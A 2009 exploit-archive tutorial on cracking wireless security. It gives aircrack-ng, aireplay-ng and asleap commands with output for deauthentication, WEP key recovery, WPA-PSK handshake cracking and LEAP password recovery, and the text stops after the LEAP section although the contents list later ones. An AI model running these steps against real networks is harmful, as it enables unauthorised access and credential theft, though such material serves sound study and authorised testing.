Wi-Foo Ninjitsu Exploitation

EDB-ID:

12956

CVE:

N/A




Platform:

Multiple

Date:

2009-02-24


		|=--------------------------------------------------------------------=|
		|=----------------=[  Wi-Foo Ninjitsu Exploitation   ]=---------------=|
		|=-----------------------=[ 24 February 2009 ]=-----------------------=|
		|=---------------------=[  By CWH Underground  ]=---------------------=|
		|=--------------------------------------------------------------------=|
				

######
 Info
######

Title	: Wi-Foo Ninjitsu Exploitation
Author	: JabAv0C && ZeQ3uL
Team    : CWH Underground [www.milw0rm.com/author/1456]
Website	: cwh.citec.us / www.citec.us
Date	: 2009-02-24


##########
 Contents
##########

  [0x00] - Introduction

  [0x01] - Security of Wireless network

  [0x02] - Breaking the Simple Defenses
	
	[0x02a] - Mac Filtering
	[0x02b] - Discover Hidden SSID
	[0x02c] - Sniffing informations on the Air

  [0x03] - Get closer with cracking tool
	
	[0x03a] - Aircrack-ng suite
	[0x03b] - Decrypt packet with airdecap-ng
	[0x03c] - Decloak packet with airdecloak-ng 
	[0x03d] - AirCracking 101
	
  [0x04] - Owned the WEP Key with Simple Technique (No Injection)

	[0x04a] - Capturing method
	[0x04b] - Cracking method

  [0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)

	[0x05a] - Monitor Mode
	[0x05b] - Fake Authentication
	[0x05c] - Arp Replay Attack
	[0x05d] - Fragmentation Attack
	[0x05e] - Korek ChopChop Attack
	[0x05f] - Packetforge
	[0x05g] - ARP Request Replay with Interactive Attack
	[0x05h] - Cracking WEP Key

  [0x06] - Conclusion steps for cracking WEP

  [0x07] - Owned the WPA-PSK/WPA2-PSK Key

  [0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)

  [0x09] - Exploiting CISCO LEAP

  [0x10] - Mass Exploit with Karmetasploit

  [0x11] - References

  [0x12] - Greetz To


#######################
 [0x00] - Introduction
#######################

	This paper introduce practical techniques used by hackers to break the wireless security.
We recommend that the reader should have basic knowledge of wireless operation.

	This paper contains 13 sections but practical content is in 10 sections, from 0x02 to 0x10.
In section 0x02, we talk about basic attacking to wireless network. Section 0x03 has content about
tools used through this tutorial. In section 0x04, 0x05 and 0x06, we provide information to crack WEP.
Section 0x07, 0x08 and 0x09 are the detail of cracking WPA and WPA2. Section 0x10 is detail about
using metasploit in wireless network through rogue AP.


#######################################
 [0x01] - Security of Wireless Network
#######################################
	
	Wireless network has serious drawback when comparing with wired network because it use air as media. So, hackers are capable of attacking 
by using man in the middle method or others.

	Therefore, security issue in wireless is highly concerned and until now, the security standard of wireless can divide like this.
	
	- WEP
	- WPA-PSK
	- WPA2-PSK
	- WPA-802.1x
	- WPA2-802.1x

	WEP is the original security standard for wireless network but it is cracked easily. WPA and WPA2 are offerred to increase wireless security
and solve the vulnerabilities in WEP. WPA and WPA2 still also devide to Pre-shared Key and 802.1x which are used for personal and enterprise
respectively. In addition to these standards, there are other mechanisms to enhance wireless security such as, hidden ssid, MAC filtering. We will
talk about hacking these security standards and mechanisms in this tutorial and also provide other attacking methods which hacker can do with 
wireless network.


#######################################
 [0x02] - Breaking the Simple Defenses
#######################################

	++++++++++++++++++++++++++++++++
	 [0x02a] - Bypass Mac Filtering
	++++++++++++++++++++++++++++++++
		
		This is a basic security method by storing legitimate client MAC address in the access point. When there is authentication request 
	to access point, the access point compares the requesting MAC address with MAC address stored in its memory. If the result is match, 
	the authentication is success otherwise it is failed. However, this method is easy to bypass, the attacker is only change the MAC address by a few commands.

		We have a case study of bypassing MAC filtering attack. One day, we have a change to do the wireless penetration testing of a company. 
	First, we use kismet to discover the access points around the company. This make us know the exact location of each access point. Then we use airodump-ng 
	by fixing channel for capturing packets. Fixing the target channel can improve efficiency of airodump-ng. We know from airodump-ng that 
	the access point use open authentication and it does not use any encryption. So, we try to connect to the access point but the access point refuse 
	our authentication request. We conclude that this network use MAC filtering. From airodump-ng, we see that there are clients associating with access point. 
	We immediately change our MAC address to be like the associated client and try to connect again. In this time, everything is fine. We can attach to access point. 
	Moreover, we are able to access internal network of this company and run any tools, such as nmap, nessus, exploit, against internal server. It is very dangerous.


	++++++++++++++++++++++++++++++++
	 [0x02b] - Discover Hidden SSID
	++++++++++++++++++++++++++++++++

		Some environment, wireless administrator config to hidden ssid. So, the attacker cannot know the ssid of network 
	and also cannot connect to that network. In airodump, it shows <lenght ?> where ? is the number of ssid lenght. 
	The only way to know the ssid name is from association request. This packet occurs when there is a legitimate client connect to network. 
	We are able to force a legitimate client to re-connect to access point by sending de-authentication packet to the client by using aireplay-ng. 
	The command for doing that is like this:

	#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
	21:56:47  Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
	21:56:47  Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]

		After sending du-authentication packet to the client, the client will do re-authentication and re-association.
	Airodump-ng can detect this process and know SSID of this network.
	

	++++++++++++++++++++++++++++++++++++++++++++
	 [0x02c] - Sniffing informations on the Air
	++++++++++++++++++++++++++++++++++++++++++++
		
		This topic does not use any advance technique or deep knowledge. Many wireless networks use open authentication without 
	encryption mechanism. The attacker needs only sniffing packets from the air and find the credential information of protocol like http, 
	telnet, ftp etc. These protocol does not have any encryption. So, we can find username and password by only looking the captured packets.
	We are able to sniff others data by using airodump-ng.


###########################################
 [0x03] - Get closer with cracking tool
###########################################

	We Recommend to use Aircrack-NG, Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets 
have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, 
thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks. 


	+++++++++++++++++++++++++++++
	 [0x03a] - Aircrack-ng suite
	+++++++++++++++++++++++++++++

		There are four tools in aircrack-ng suite which play an important role in this tutorial.

	- airodump-ng: used for capturing packets
		Use airodump-ng first every time in order to open monitor mode, which also enable injection capability of our card, in preferred channel
	- aireplay-ng: used for injection
		o de-authentication: used to send deauthentication packet to associated client
		o fake authentication: used to perform fake authentication process
		o interactive packet replay: used to choose the preferred packet to perform replay attack
		o arp replay: used to perform arp replay attack automatically
		o Korek chopchop: used to generate key stream by using chopchop technique
		o fragment: used to generate key stream by using fragment technique 
	- packetforge-ng: used for create packet
	- aircrack-ng: used for recovering key

	More detail: http://aircrack-ng.org/doku.php#aircrack-ng_suite1


	+++++++++++++++++++++++++++++++++++++++++++
	 [0x03b] - Decrypt packet with airdecap-ng
	+++++++++++++++++++++++++++++++++++++++++++

		After we got WEP or WPA key, sometime we want to decrypt captured packet. Aircrack team has already
	provide us the tool for doing that. It is called "airdecap-ng". Examples of using airdecap is something like:

	#airdecap-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap

	or

	#airdecap-ng -e Workshop workshop-02.cap

	The output from these commands is file ending with "-dec.cap".

	PS. for WPA, airdecap-ng will return successful result for only file which contains four ways handshake.


	+++++++++++++++++++++++++++++++++++++++++++++
	 [0x03c] - Decloak packet with airdecloak-ng 
	+++++++++++++++++++++++++++++++++++++++++++++

		Cloaking is a technique to disturb cracking WEP key process. This technique is done by injecting packets which are encrypted with random WEP key 
	to the network, these packets are called "chaff". If the attacker capture these packet and do the cracking, The result will be wrong or there is no result 
	returned. However, aircrack team developped the tool to deal with this technique, it is called "airdecloak-ng".

	#airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap

	This command return two files:
	- workshop-01-filtered.cap: contain the filtered packets from specific bssid
	- workshop-01-cloaked.cap: contain the cloaked packets from specific bssid


	++++++++++++++++++++++++++++
	 [0x03d] - AirCracking 101 
	++++++++++++++++++++++++++++

		PTW Attack (-z)
			(aircrack-ng -z capture.cap), Only work for WEP 64/128 bits, Require ARP request/replay packet that you must dump all packet from airodump-ng

		Dictionary Attack (WPA/WPA2 passphrases) 
			(aircrack-ng -w pass.lst *.cap)

		Fudge Attack (-f)
			Once hit 2 millions IVs, Try fudge factor to "-f 4". Retry, increasing the fudge factor by adding 4 to it each time.
		

	** All the while, keep collecting data. Remember the golden rule, "The More IVs the Better"


#################################################################	
 [0x04] - Owned the WEP Key with Simple Technique (No Injection)
#################################################################
		
		WEP is just like a dead method to protect network from unauthorized access. There are several means to crack WEP key. 
	The first of all, we should prepare the device which supports monitor mode and can inject packet to the network. 

		After that we prepare tools for cracking, I choose to use aircrack-ng in BT3 final on vmware.

	Ok, let clear about concept of cracking WEP.
	The main idea is to collect the encrypted packets as much and fast as we can and then use these packets to crack for the WEP key.
	So, there are two situations from the above idea.

		1. The network is high traffic.
		2. The network is low traffic.

	What's different between them?
	Of course, the first case, we use only airodump to collect packet and crack the key but the second case, 
	we have to inject packets to capture more packets. We introduce you, first, the capturing and cracking method.
	Then we talk about injecting method which is used only with low traffic network.
		

	++++++++++++++++++++++++++++
	 [0x04a] - Capturing method
	++++++++++++++++++++++++++++
		
		First, introduce you the way to collect packets. For 64-bits WEP key, we use about 50,000 IV packets and 
	about 150,000 IV packets for 128-bits WEP key.

	The command for collecting packets is

	#airodump-ng –w workshop rausb0

	------------------------------------------------------------------------------------------
	 [ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx

	 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

	 xx:xx:xx:xx:xx:xx   77  94    10905    11054    0  11  54. WEP  WEP    OPN  Workshop
	
	 BSSID              STATION            PWR   Rate  Lost  Packets  Probes
	
	 xx:xx:xx:xx:xx:xx  yy:yy:yy:yy:yy:yy   85  54-54     0     7747  
	------------------------------------------------------------------------------------------

	We will get file “workshop-01.cap” used for cracking the key later.

	We can determine the number of packet by the data field, around 90% of packets showing in data field are our required IV packets.

	
	+++++++++++++++++++++++++++
	 [0x04b] - Cracking method
	+++++++++++++++++++++++++++
		
		After we collected enough encrypted packets (IV packets), we use aircrack-ng for recovering the key.

	#aircrack-ng –b xx:xx:xx:xx:xx:xx workshop-01.cap
	
	-b xx:xx:xx:xx:xx:xx is the MAC address of target access point

	The successful cracking result is following:
	---------------------------------------------------------------
	Opening workshop-01.cap
	Attack will be restarted every 5000 captured ivs.
	Starting PTW attack with 50417 ivs.
                         KEY FOUND! [ 00:11:22:33:44 ]
        Decrypted correctly: 100%
	---------------------------------------------------------------

#########################################################################	
 [0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)
#########################################################################
 
	This method is not necessary in high traffic network but it is very important in low traffic network. The idea behind this method is that 
we have to inject a packet to force access point to generate new packet back to client. The new packet contains new IV.

	If we carefully think about above idea, the source MAC address must be associated, the packet must send from client to access point 
and the packet must cause the access point to produce the response or another packet; normally we should the packet which has broadcast MAC address.

	We can conclude about the requirements of chosen packet for injection as following.
	- The MAC address is associated to access point. (we can do this by fake authentication)
	- Send from client to access point. (the “To DS” flag is set to 1)
	- The destination MAC address is broadcast. (FF:FF:FF:FF:FF:FF)

	The well-known packet which covers all requirements is arp request broadcast. In the aircrack-ng suite, there is aireplay-ng which has an option to perform arp replay attack. The idea of this attack is to capture the arp request and then replay it to access point in order to generate new IV packets. But if that network has no arp request broadcast at that time. Now, we can divide the situation for injection technique into 2 scenarios.
	- The network has ARP request.
	- The network has no ARP request.

	No matter which case we are faced with, the important we have to realize is that we have to perform injection with associated MAC address. 
Now, we have two choices. First is to change our MAC address to be the associated MAC address or the second is to do fake authentication.


	++++++++++++++++++++++++
	 [0x05a] - Monitor Mode
	++++++++++++++++++++++++	

		Using airmon-ng for setting your wifi card to Monitor Mode and prepare for Injection packet.
	
	#airmon-ng start wlan0 11
		
		Setting wlan0 to Monitor mode on channel 11, We must specify the same channel as the target AP channel. 

	+++++++++++++++++++++++++++++++
	 [0x05b] - Fake Authentication
	+++++++++++++++++++++++++++++++

		We can do fake authentication by following command.

		#aireplay-ng -1 0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0

		–a xx:xx:xx:xx:xx:xx is MAC address of access point
		–h yy:yy:yy:yy:yy:yy is MAC address of our wireless card

		If we get successful result, our MAC address will associate with particular access point.

	The successful result look like:
	------------------------------------------
	00:00:00  Sending Authentication Request
	00:00:00  Authentication successful
	00:00:00  Sending Association Request
	00:00:00  Association successful :-)
	------------------------------------------

	After succeeding in fake authentication, we have to determine what type of network we are faced with and pick the appropriate steps to deal with it.


	+++++++++++++++++++++++++++++
	 [0x05c] - Arp Replay Attack
	+++++++++++++++++++++++++++++
	
		We can use arp replay attack by following command.

		#aireplay-ng -3 -b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0

		–b xx:xx:xx:xx:xx:xx is MAC address of access point
		–h yy:yy:yy:yy:yy:yy is MAC address of our wireless card

		Aireplay-ng will detect arp request and use it to perform replay attack automatically.

	The response will look like following when it find out arp request.
	------------------------------------------------------------------------------------
	21:06:20  Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
	Saving ARP requests in replay_arp-0223-210620.cap
	You should also start airodump-ng to capture replies.
	Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps)
	------------------------------------------------------------------------------------
	
		** In some cases, there is no arp request broadcasted from access point. So, we cannot use normal arp replay attack. 
	We have to generate key stream from captured packet and use the key stream to forge arp request packet and then replay to access point 
	in order to generate new IV packet. There are two ways for generate key stream called “chopchop attack” and “fragment attack”. 
	Both methods can perform by aireplay-ng.


	++++++++++++++++++++++++++++++++
	 [0x05d] - Fragmentation Attack
	++++++++++++++++++++++++++++++++

		Fragment attack is used to generate key stream in a size of 1500 bytes. So, we can use this key stream to create a packet 
	which has size up to 1500 bytes. The command for fragment attack is

		#aireplay-ng -5 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0

	The system responds with this:
	-------------------------------------------------------------------------------
	21:21:07  Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
	21:21:07  Waiting for a data packet...


		Size: 90, FromDS: 1, ToDS: 0 (WEP)
	
	              BSSID  =  00:1B:2F:3D:CB:D6
	          Dest. MAC  =  00:1A:73:37:E2:A3
	         Source MAC  =  00:1B:2F:3D:CB:D6
	
	        0x0000:  8842 2c00 001a 7337 e2a3 001b 2f3d cbd6  .B,...s7..../=..
	        0x0010:  001b 2f3d cbd6 20df 0000 b168 ff00 2872  ../=.. ....h..(r
	        0x0020:  7547 d03f 70d7 2d29 1397 7d3d ac16 382a  uG.?p.-)..}=..8*
	        0x0030:  f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263  ..w..c.....(...c
	        0x0040:  5315 a328 87cb 0d4a b36a e5be 93c7 307a  S..(...J.j....0z
	        0x0050:  7bc2 18d7 2df5 94f2 5aed                 {...-...Z.
	
	Use this packet ? 
	-------------------------------------------------------------------------------
	
	We have to answer "y"
	
	-----------------------
	Use this packet ? y
	-----------------------
	
	And the successful process looks like this:
	----------------------------------------------------------------------------------
	Saving chosen packet in replay_src-0223-212107.cap
	Data packet found!
	Sending fragmented packet
	Got RELAYED packet!!
	Thats our ARP packet!
	Trying to get 384 bytes of a keystream
	Got RELAYED packet!!
	Thats our ARP packet!
	Trying to get 1500 bytes of a keystream
	Got RELAYED packet!!
	Thats our ARP packet!
	Saving keystream in fragment-0223-212107.xor
	Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
	----------------------------------------------------------------------------------


	+++++++++++++++++++++++++++++++++
	 [0x05e] - Korek ChopChop Attack
	+++++++++++++++++++++++++++++++++

		There is a guy called KoreK who develop the tricky attacking method called chopchop. It requires only one encrypted packet used to decrypt 
	to get key stream and then use the key stream to generate arp request packet and finally perform arp replay attack. 
	We are able to use chopchop attack with this command.

		#aireplay-ng -4 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0

		Aireplay-ng will pick a packet for decrypting. we can should any packet which has BSSID like our target. 
	
	The response from the command looks like this:
	--------------------------------------------------------------------------------------
	21:12:42  Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11


		Size: 90, FromDS: 1, ToDS: 0 (WEP)

	              BSSID  =  00:1B:2F:3D:CB:D6
	          Dest. MAC  =  00:1A:73:37:E2:A3
	         Source MAC  =  00:1B:2F:3D:CB:D6
	
	        0x0000:  8842 2c00 001a 7337 e2a3 001b 2f3d cbd6  .B,...s7..../=..
	        0x0010:  001b 2f3d cbd6 6084 0000 55bc e600 2e4e  ../=..`...U....N
	        0x0020:  a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0  .4...L..,..H.'..
	        0x0030:  767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0  v}'%..b.%..K....
	        0x0040:  bb3f 4874 c821 c402 467d f70f 2a56 43a7  .?Ht.!..F}..*VC.
	        0x0050:  b09b f0f1 8b04 fc1c 0b72                 .........r
	
	Use this packet ? 
	----------------------------------------------------------------------------------------
	
	And we will answer by typing "y" like this
	
	---------------------
	Use this packet ? y
	---------------------
	
	And then the system do the decrypting
	
	---------------------------------------------------------------------------------------
	Saving chosen packet in replay_src-0223-211242.cap
	
	Offset   87 ( 3% done) | xor = 4E | pt = 3C |   64 frames written in  1097ms
	Offset   86 ( 5% done) | xor = 16 | pt = 1D |  119 frames written in  2029ms
	Offset   85 ( 7% done) | xor = 63 | pt = 7F |  146 frames written in  2476ms
	Offset   84 ( 8% done) | xor = 97 | pt = 6B |  239 frames written in  4068ms
	Offset   83 (10% done) | xor = 0E | pt = 0A |  228 frames written in  3865ms
	Offset   82 (12% done) | xor = 86 | pt = 0D |  273 frames written in  4646ms
	Offset   81 (14% done) | xor = C9 | pt = 38 |    2 frames written in    35ms
	Offset   80 (16% done) | xor = C4 | pt = 34 |  185 frames written in  3145ms
	Offset   79 (17% done) | xor = BB | pt = 20 |  250 frames written in  4253ms
	Offset   78 (19% done) | xor = F7 | pt = 47 |   97 frames written in  1649ms
	Offset   77 (21% done) | xor = E9 | pt = 4E |  247 frames written in  4196ms
	Offset   76 (23% done) | xor = 12 | pt = 51 |  237 frames written in  4029ms
	Offset   75 (25% done) | xor = 56 | pt = 00 |   52 frames written in   884ms
	Offset   74 (26% done) | xor = 2A | pt = 00 |  431 frames written in  7326ms
	Offset   73 (28% done) | xor = 7E | pt = 71 |  232 frames written in  3946ms
	Offset   72 (30% done) | xor = 1C | pt = EB |  123 frames written in  2093ms
	Offset   71 (32% done) | xor = B6 | pt = CB |    9 frames written in   141ms
	Offset   70 (33% done) | xor = BC | pt = FA |  256 frames written in  4365ms
	Offset   69 (35% done) | xor = 1A | pt = 18 |  179 frames written in  3041ms
	Offset   68 (37% done) | xor = 94 | pt = 50 |  118 frames written in  2002ms
	Offset   67 (39% done) | xor = 50 | pt = 71 |   65 frames written in  1109ms
	Offset   66 (41% done) | xor = 9D | pt = 55 |  172 frames written in  2921ms
	Offset   65 (42% done) | xor = 3C | pt = 48 |  196 frames written in  3338ms
	Offset   64 (44% done) | xor = BE | pt = F6 |  281 frames written in  4763ms
	Offset   63 (46% done) | xor = 81 | pt = BE |   61 frames written in  1051ms
	Offset   62 (48% done) | xor = AC | pt = 17 |  456 frames written in  7748ms
	Offset   61 (50% done) | xor = D2 | pt = 72 |   73 frames written in  1231ms
	Offset   60 (51% done) | xor = 9C | pt = 34 |  428 frames written in  7288ms
	Offset   59 (53% done) | xor = 64 | pt = B7 |  120 frames written in  2036ms
	Offset   58 (55% done) | xor = 87 | pt = 55 |  188 frames written in  3200ms
	Offset   57 (57% done) | xor = 0C | pt = 47 |  119 frames written in  2024ms
	Offset   56 (58% done) | xor = 8C | pt = 07 |  124 frames written in  2095ms
	Offset   55 (60% done) | xor = 2C | pt = 02 |  364 frames written in  6197ms
	Offset   54 (62% done) | xor = 25 | pt = 00 |  136 frames written in  2315ms
	Offset   53 (64% done) | xor = 44 | pt = A8 |  142 frames written in  2410ms
	Offset   52 (66% done) | xor = A2 | pt = C0 |  102 frames written in  1733ms
	Offset   51 (67% done) | xor = C9 | pt = 14 |   19 frames written in   329ms
	Offset   50 (69% done) | xor = D5 | pt = 6B |  183 frames written in  3110ms
	Offset   49 (71% done) | xor = 0B | pt = 2E |   62 frames written in  1048ms
	Offset   48 (73% done) | xor = E8 | pt = CF |   18 frames written in   306ms
	Offset   47 (75% done) | xor = FB | pt = 86 |   29 frames written in   496ms
	Offset   46 (76% done) | xor = 4B | pt = 3D |  100 frames written in  1702ms
	Offset   45 (78% done) | xor = D6 | pt = 06 |   77 frames written in  1312ms
	Offset   44 (80% done) | xor = FD | pt = 6D |  226 frames written in  3828ms
	Offset   43 (82% done) | xor = 27 | pt = 00 |  117 frames written in  2001ms
	Offset   42 (83% done) | xor = 4F | pt = 40 |   38 frames written in   641ms
	Offset   41 (85% done) | xor = 1C | pt = 54 |  354 frames written in  6020ms
	Offset   40 (87% done) | xor = 20 | pt = D5 |  277 frames written in  4714ms
	Offset   39 (89% done) | xor = C4 | pt = 30 |  113 frames written in  1918ms
	Offset   38 (91% done) | xor = 2C | pt = 00 |  485 frames written in  8244ms
	Offset   37 (92% done) | xor = 8A | pt = 00 |  231 frames written in  3933ms
	
	
	The AP appears to drop packets shorter than 37 bytes.
	Enabling standard workaround:  IP header re-creation.
	This doesn't look like an IP packet, try another one.
	
	Warning: ICV checksum verification FAILED! Trying workaround.
		
	The AP appears to drop packets shorter than 40 bytes.
	Enabling standard workaround:  IP header re-creation.
		
	Saving plaintext in replay_dec-0223-211410.cap
	Saving keystream in replay_dec-0223-211410.xor
	
	Completed in 21s (2.48 bytes/s)
	---------------------------------------------------------------------------------------

	The result from this process is xor file and cap file. xor file contains key stream and cap file contains decrypted packet. 

	
	+++++++++++++++++++++++
	 [0x05f] - Packetforge
	+++++++++++++++++++++++

		Creat encrypted packet form PRGA (XOR) that obtained from chopchop or fragment.

		#Packetforge-ng -0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy –k 255.255.255.255 –l 255.255.255.255 –y replay_dec-0223-211410.xor –w arp

	The result is:
	----------------------
	Wrote packet to: arp
	----------------------
	
	From this command, we get arp request packet in file named “arp”. 


	++++++++++++++++++++++++++++++++++++++++++++++++++++++
	 [0x05g] - ARP Request Replay with Interactive Attack
	++++++++++++++++++++++++++++++++++++++++++++++++++++++

		We use aireplay to inject arp request packet to access point by following command.

		#aireplay-ng -2 –r arp rausb0

	The response will look like:
	-----------------------------------------------------------------------------------
		Size: 68, FromDS: 0, ToDS: 1 (WEP)
	
	              BSSID  =  00:1B:2F:3D:CB:D6
	          Dest. MAC  =  FF:FF:FF:FF:FF:FF
	         Source MAC  =  00:21:27:C0:07:71
	
	        0x0000:  0841 0201 001b 2f3d cbd6 0021 27c0 0771  .A..../=...!'..q
	        0x0010:  ffff ffff ffff 8001 55bc e600 2e4e a334  ........U....N.4
	        0x0020:  a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b  ...J..$.&.O&..l;
	        0x0030:  ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e  .z*6].%,...dc-S~
	        0x0040:  66bf 700e                                f.p.
	
	Use this packet ?   
	-----------------------------------------------------------------------------------
	
	We have to answer "y"
	
	---------------------
	Use this packet ? y
	---------------------
	
	aireplay-ng starts injecting the packet.
	
	-------------------------------------------------------
	Saving chosen packet in replay_src-0223-211755.cap
	You should also start airodump-ng to capture replies.
	
	Sent 1200 packets...(499 pps)
	-------------------------------------------------------
	

	++++++++++++++++++++++++++++
	 [0x05h] - Cracking WEP Key
	++++++++++++++++++++++++++++

		After we collected enough encrypted packets (IV packets), we use aircrack-ng for recovering the key.

		#aircrack-ng –z capture1.cap (PTW Attack)

	The successful cracking result is following:
	---------------------------------------------------------------
	Opening capture1.cap
	Attack will be restarted every 5000 captured ivs.
	Starting PTW attack with 50417 ivs.
	                         KEY FOUND! [ 00:11:22:33:44 ]
	        Decrypted correctly: 100%
	---------------------------------------------------------------


##############################################
 [0x06] - Conclusion Scripts for Cracking WEP
##############################################
	
	Note: $AP is Access Point MAC Address
	      $WIFI is WIFI Card MAC Address

	- airmon-ng start wlan0 11 (Must specific channel of Monitor Mode)
	- airodump-ng -c 11 -w capture1.cap wlan0
	- aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
	- aireplay-ng -4 -b $AP -h $WIFI wlan0
		If Not Work!! Try #aireplay-ng -5 -b $AP -h $WIFI wlan0
	- packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay_dec-03.xor -w arp-request
	- aireplay-ng -2 -r arp-request wlan0
	- aircrack-ng -z capture1.cap

	** These Method can use for Crack WEP with Clientless


#########################################
 [0x07] - Owned the WPA-PSK/WPA2-PSK Key
#########################################

	PSK stands for Pre-Shared Key. These are mechanism improved to solve WEP vulnerabilities.
So, it is able to crack the key by using the same ways as cracking WEP. The only way to recover WPA-PSK or WPA2-PSK is to capture 
four ways handshake and crack by using dictionary attack.

	The idea for cracking Pre-shared key is to gather four ways handshake packet. We are able to do this by de-authenticate associated client. 
This way will force the client to perform re-authentication and we can get four ways handshake from this process. The command for de-authentication is:

	#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
	21:56:47  Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
	21:56:47  Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]

	We assume that we capture this process in workshop.cap file. So, we perform cracking by using aircrack.

	#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap

The successful result is following.
--------------------------------------------------------------------------------
Opening test-02.cap
Read 252 packets.

   #  BSSID              ESSID                     Encryption

   1  xx:xx:xx:xx:xx:xx  Workshop                   WPA (1 handshake)

Choosing first network as target.

Opening workshop-02.cap
Reading packets, please wait...


                                 Aircrack-ng 1.0 rc1 r1085


                   [00:00:00] 0 keys tested (0.00 k/s)


                        KEY FOUND! [ TheFuckinWPAKey ]


      Master Key     : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4
                       E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63

      Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6
                       61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2
                       9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86
                       2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1

      EAPOL HMAC     : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
--------------------------------------------------------------------------------

From this result, it means WPA-PSK/WPA2-PSK key is "TheFuckinWPAKey".


#############################################################
 [0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
#############################################################

	Most companies turned to use public key encryption with wireless network and they think that
it is perfectly safe. But the tricky hacker still attacks this system by spoofing certificate.

This attacking method takes an advantage of client incaution. Many clients accept certification
without considering whether it is genuine certificate or not. This make attacker impersonate himself
to be radius server and loggin credential information from victims.

We can use freeradius as fake radius server combining with wpe patch to enable loggin credential
information on freeradius server

additional information: http://www.willhackforsushi.com/FreeRADIUS_WPE.html


################################
 [0x09] - Exploiting CISCO LEAP
################################

	Cisco proprietary Lightweight Extensible Authentication Protocol (LEAP) wireless authentication process helps eliminate security vulnerabilities 
by supporting centralized, user-based authentication and the ability to generate dynamic WEP keys. Cisco LEAP is one of the extensible authentication protocol (EAP) 
types specified by 802.1X.
	
	LEAP is easy to implement and contains compelling features such as: 
	- Mutual Authentication
	- User-Based Authentication
	- Dynamic WEP Keys

	We found username that send to Radius is plaintext that captured from wireshark but password was encrypted, So It's also Vulnerable for Exploit...


	asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords, asleap can perform:

	- Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture
	- Deauthentication of clients on a leap WLAN (speeding up leap password recovery) AIRJACK DRIVER REQUIRED

	Download Here: http://asleap.sourceforge.net/

	First step, Use asleap to produce the necessary database (.dat) and index files (.idx)
	
	#./genkeys  -r  dict  -f  dict.dat  -n  dict.idx

	dict = Our wordlist/dictionary file, with one word per line
	dict.dat = Our new output pass+hash file (generated as a result of running this command)
	dict.idx = Our new output index filename (generated as a result of running this command)


	#./genkeys -r dictionary -f dict.dat -n dict.idx
	
	-----------------------------------------------------------------------
	genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
	Generating hashes for passwords (this may take some time) ...Done.
	3 hashes written in 0.2 seconds:  122.67 hashes/second
	Starting sort (be patient) ...Done.
	Completed sort in 0 compares.
	Creating index file (almost finished) ...Done.
	-----------------------------------------------------------------------
	
	The final step in recovering our weak LEAP password is to run the asleap command with our newly created .dat and .idx files:

	#./asleap  -r  data/leap.dump  -f  dict.dat  -n  dict.idx

	leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used)
	dict.dat = Our output pass+hash file (generated with genkeys, see above)
	dict.idx = Our new output index filename (generated with genkeys, see above)
	
	#./asleap -r data/leap.dump -f dict.dat -n dict.idx

	-----------------------------------------------------------------------
	asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
	Using the passive attack method.

	Captured LEAP exchange information:
		username:	qa_leap
		challenge:	0786aea0215bc30a
		response:	7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
		hash bytes:	4a39
		NT hash:	a1fc198bdbf5833a56fb40cdd1a64a39
		password:	qaleap
	Closing pcap ...
	-----------------------------------------------------------------------

